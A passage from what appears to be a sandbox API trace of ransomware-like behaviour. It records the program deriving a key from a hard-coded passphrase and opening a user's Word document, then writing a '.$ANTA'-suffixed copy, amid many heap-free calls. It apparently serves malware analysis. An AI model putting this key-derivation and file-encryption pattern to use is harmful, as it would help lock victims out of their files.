[0077.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca4c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0077.255] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0077.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0077.255] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0077.256] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0077.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0077.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0077.256] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0077.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca8e0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0077.256] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2848, dwDataLen=0x22, dwFlags=0x1) returned 1 [0077.256] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0077.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca508, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0077.256] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac700) returned 1 [0077.256] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0077.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0077.256] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ee8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0077.256] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0077.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0077.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.256] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0077.257] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0077.258] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.258] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.259] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e28a8 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0077.260] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0077.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0077.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.261] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0077.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0077.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0077.261] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0077.261] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.261] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.261] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\NHgtkAPLnX.docx" (normalized: "c:\\users\\fd1hvy\\documents\\nhgtkaplnx.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0077.261] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.261] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.262] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0077.262] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43597f8 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.262] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0077.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0077.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0077.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.263] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0077.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0077.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0077.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.263] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0077.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0077.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0077.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0077.263] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0077.263] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\NHgtkAPLnX.docx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\nhgtkaplnx.docx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0077.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0077.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0077.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0077.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0077.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0077.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0077.264] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0077.264] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0077.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0077.264] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0077.264] RtlAllocateHeap (HeapHandle=0x1780000, 